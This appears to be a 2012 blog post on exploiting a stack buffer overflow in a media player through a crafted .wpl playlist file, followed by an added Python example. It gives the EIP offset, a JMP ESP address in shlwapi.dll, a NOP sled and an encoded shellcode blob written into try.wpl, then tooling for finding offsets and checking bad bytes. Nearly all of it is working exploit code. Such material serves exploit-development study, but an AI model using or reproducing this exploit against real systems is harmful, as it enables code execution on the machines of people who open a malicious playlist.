Friday, 17 February 2012

OK, this is my last attempt. This time I tried to exploit the player through a *.wpl playlist file, and here is the result.
1. The first screenshot shows EIP overwritten with the A character, so the saved return address is under my control.
2. The second screenshot shows EIP overwritten with DEADBEEF. I got this after filling the stack with 43500 bytes of junk: the four bytes that follow the junk are the ones that land in EIP.
3. I used shlwapi.dll to find a JMP ESP instruction (0x77FAB227). Note that this address is only valid for the exact shlwapi.dll build on the test machine; on another Windows version the DLL base or the instruction offset differs, and with ASLR it changes on every boot.
4. Here is my script:
# Junk to reach the saved return address (43500 bytes of 'C', 0x43)
jnk = b"\x43" * 43500
#jnk += b"\xEF\xBE\xAD\xDE"      # stage 2: 0xDEADBEEF little-endian, to confirm EIP control
jnk += b"\x27\xB2\xFA\x77"       # 0x77FAB227 = JMP ESP in shlwapi.dll, little-endian
#jnk += b"\x41"*16
jnk += b"\x90" * 32              # NOP sled; ESP points here after JMP ESP

# Encoded shellcode (payload as posted)
jnk += (b"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
b"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"
b"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"
b"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"
b"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"
b"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"
b"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"
b"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"
b"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"
b"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"
b"\x5a\x20\xd3\x4e")

ex = jnk
# Write in binary mode: a text-mode write in Python 3 would UTF-8 encode every byte >= 0x80 and corrupt the payload
file = open("try.wpl", "wb")
file.write(ex)
file.close()
# The JMP ESP address is 77FAB227; reversed for little-endian it becomes "\x27\xB2\xFA\x77". Found in shlwapi.dll.
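The offset-finding and file-building steps above, as an added example that is not the post's own script: it replaces the 43500 bytes of plain junk with a De Bruijn pattern so that a single crash gives the exact EIP offset (the pattern stays unique well past the 20280 bytes where the usual Aa0Aa1... scheme repeats), packs the return address with struct.pack instead of reversing the bytes by hand, checks the payload for bad bytes, and writes the file in binary mode. The 43500 offset and the 0x77FAB227 address are the post's; the bad-byte set, the sample EIP value 0x63616161 and the INT3 stand-in shellcode are assumptions made for this example.

```python
import struct
from itertools import islice

# Values taken from the post: 43500 bytes of junk reach the saved return
# address, and 0x77FAB227 is a JMP ESP inside shlwapi.dll on the test box.
EIP_OFFSET = 43500
JMP_ESP = 0x77FAB227

# Assumed bad-byte set for illustration only: the post lists none. A NUL is
# the usual suspect for a playlist parsed as text; adjust after testing.
ASSUMED_BADCHARS = b"\x00"


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield a De Bruijn sequence B(k, n) over `alphabet` (FKM algorithm).

    Every n-byte window is unique, so the value that lands in EIP maps back
    to exactly one offset. With 26 letters and n=4 that holds for just under
    456976 bytes, far beyond the 43500 needed here.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern; use it as the junk in a crash run."""
    return bytes(islice(de_bruijn(), length))


def cyclic_find(value, length=EIP_OFFSET + 8):
    """Offset of the 4 bytes that landed in EIP, or -1 if not in the pattern.

    An int is treated as the little-endian register value the debugger shows.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return cyclic(length).find(needle)


def check_badchars(payload, badchars=ASSUMED_BADCHARS):
    """Offsets of bytes the target might strip or truncate on."""
    return [i for i, b in enumerate(payload) if b in badchars]


def build_exploit(offset, ret_addr, shellcode, filler=b"\x43", nops=32):
    """Same layout as the post's script: junk | ret | NOP sled | shellcode."""
    payload = filler * offset
    payload += struct.pack("<I", ret_addr)   # pack() does the byte reversal
    payload += b"\x90" * nops                # ESP points here after JMP ESP
    payload += shellcode
    return payload


def eip_value(payload, offset=EIP_OFFSET):
    """What the saved return address slot holds, as the debugger would show it."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


if __name__ == "__main__":
    # Crash run: send cyclic(EIP_OFFSET + 8) instead of plain 'C's. Suppose the
    # debugger then shows EIP = 0x63616161 (constructed value for this example).
    print("EIP offset:", cyclic_find(0x63616161))

    # Real layout with an INT3 stand-in for the shellcode (constructed).
    ex = build_exploit(EIP_OFFSET, JMP_ESP, b"\xcc" * 4)
    assert eip_value(ex) == JMP_ESP and not check_badchars(ex)
    with open("try.wpl", "wb") as f:       # binary mode: no text encoding
        f.write(ex)
```

The first run writes the pattern instead of the 'C' filler; whatever value the debugger shows in EIP is then fed to cyclic_find, which replaces the trial-and-error of growing the junk until DEADBEEF appears. Because the return address is packed from the integer, a typo such as "\X77" in a hand-reversed string cannot creep in.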
